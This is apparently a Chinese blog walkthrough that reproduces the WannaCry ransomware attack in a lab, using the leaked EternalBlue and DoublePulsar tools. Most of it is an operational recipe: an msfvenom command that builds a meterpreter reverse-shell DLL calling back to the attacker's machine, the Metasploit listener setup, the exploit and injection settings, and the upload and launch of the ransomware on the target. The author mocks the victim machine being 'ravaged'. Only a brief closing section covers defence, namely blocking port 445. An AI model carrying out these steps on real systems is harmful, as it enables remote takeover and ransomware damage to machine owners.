勒索病毒“WannaCry”之复现过程（永恒之蓝）

1.漏洞简述

“永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限，该工具通过恶意代码扫描开放445端口的Windows系统；被扫描到的Windows系统，只要开机上线，不要要用户进行任何操作，即可通过共享漏洞上传wannacry勒索病毒，远程控制木马等恶意程序。

2.漏洞复现

2.1复现环境

注意：复现过程请在虚拟机中运行，运行之前关闭虚拟机的文件共享，否则有可能感染真机，真机一旦被感染，你就真的真的“想哭”（wannacry）了

2.2.1 环境搭建：

    攻击机1：kali-linux-2018.2-i386                            IP：192.168.15.176
    攻击机2：win_server_2003                                   IP：192.168.15.154
    靶机   ：win_07(x64)                                       IP：192.168.15.164

2.2.2实验工具：

	 Python 2.6                ： https://www.python.org/download/releases/2.6/
	 Python32-221.win32-py2.6  ：https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
	 Shadowbroker-master 工具包：https://github.com/misterch0c/shadowbroker.git

2.2.3 攻击机2（win_server_2003 ）配置

	第一步：安装Python 2.6，配置环境变量，添加Python26的安装路径到path（例如：安装路径为C:\Python26\，在path中追加;C:\Python26\;注：前后分号为英文格式）；
	第二步：安装Python32-221.win32-py2.6，傻瓜式安装即可
	第三步：安装Shadowbroker-master，将安装包copy到攻击机2中，在Windows文件夹中新建文件夹logs和listeningposts；用记事本打开Windows文件夹中的Fuzzbunch.xml文件，修改ResourcesDir和LOogDir的路径；

第四步：运行永恒之蓝工具，若出现一下界面则恭喜你工具安装成功：

2.3复现过程

2.3.1 扫描靶机是否开启445端口
2.3.2 kali生成后门文件（文件类型：.dll）

 3.2.1：使用kali的msfvenom工具：其中 -p：指定使用模块类型；LSHOT：指定本地IP；LPORT：指定本地端口（具体使用方法，自行help）：
 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.176 LPORT=6666 -f dll > abc.dl	 

 3.2.2 上传dll文件到攻击机2中，可使用SecureCRT 或xshell等外联软件；或者简单粗暴使用，给虚拟机直接装wmvare tools，直接傻瓜式来回拷贝即可。	

2.3.3 开始攻击

3.3.1 攻击机2---->开始运行“永恒之蓝：

  1.默认目标IP地址：Default Targer IP Address: 靶机IP
  2.默认回弹IP地址：Default Callback IP Address:攻击机1IP地址
  3.是否使用重定向：Use Rdirection [yes] :no
  4.新建项目：Create a New Project
  5.给项目起个名字：New Project Name:test1
  6.其他选项，全部默认，直接enter即可

3.3.2 攻击机2---->加载“永恒之蓝”模块，获取靶机的系统权限：

 1.加载永恒之蓝：use Eternalblue
 2.靶机操作系统类型，根据攻击前收集信息可知靶机为win7（直接用nmap扫描即可获得靶机信息），选择对应编号
 3.模式mode：选择FB（该模式下，会进行交互性参数输入）
 4.其他大都为确认信息，其他参数可默认也可自行修改
 5.看到WIN、Eternalblue Succeeded，那么恭喜你获取靶机权限成功

3.3.3 攻击机1---->kali开启监听，等待返回shell

 1.加载msfconsole
 2.加载handler：use exploit/multi/handler
 3.设置paylod：set payload windows/x64/meterpreter/reverse_tcp
 4.设置本地IP：set LHOST 192.168.15.176
 5.设置本地端口：set LPORT 6666
 6.开始监听：run

3.3.4 攻击机2---->win_server_2003进行双倍脉冲（Doublepulsar）注入：

 1.加载Doublepulsar:use Doublepulsar
 2.使用协议：选择SMB（关于SMB和RDP，自行百度）
 3.使用后门的方法：2选择RunDll
 4.设置dll路径：c:\\abc.dll
 5.其他操作默认即可，直接enter
 6.注入成功：Doublepulsar
 7.返回kali，看到meterpreter，恭喜你已经成功获取靶机shell

3.3.5 攻击机1---->上传勒索病毒并执行：

 1.在靶机上传文本类文件，以验证实验
 2.kali上传勒索病毒：upload /root/wcry.exe  c:\\
 3.获取靶机cmd：shell
 4.解决反弹shell后中文乱码问题：chcp 65001
 5.进入c盘查看文件：dir
 6.运行病毒：直接执行就好，获取靶机cmd后，靶机已经属于你了，可以任由你怎么蹂躏都可以。

3.3.6 返回靶机，尽情享受靶机被蹂躏的欢乐吧

3.结语

本次实验对“永恒之蓝”进行wannacry攻击的过程进行复现，本次复现过程在虚拟机中进行，不可在真机中运行，实验前一定关闭虚拟机的文件文件共享功能；本次复现过程旨在认识勒索病毒攻击靶机的过程，通过对病毒入侵的过程进行复现，了解病毒的危害，加强防范意识。

4.防范

关闭虚拟机共享

勒索病毒主要通过445端口入侵计算机，以下以445为例关闭端口
控制面板–>windows防火墙—>高级选项–>入站规则–>1.新建规则，选择端口–>2.指定端口号–>3.选择阻止连接–>4.配置文件全选–>5.规则名称–>6.成功关闭

自己录制了一个勒索病毒大战彩虹猫的视频，有兴趣的小伙伴可以自行去看一下： https://v.youku.com/v_show/id_XNDMwNDU1NTE2MA==.html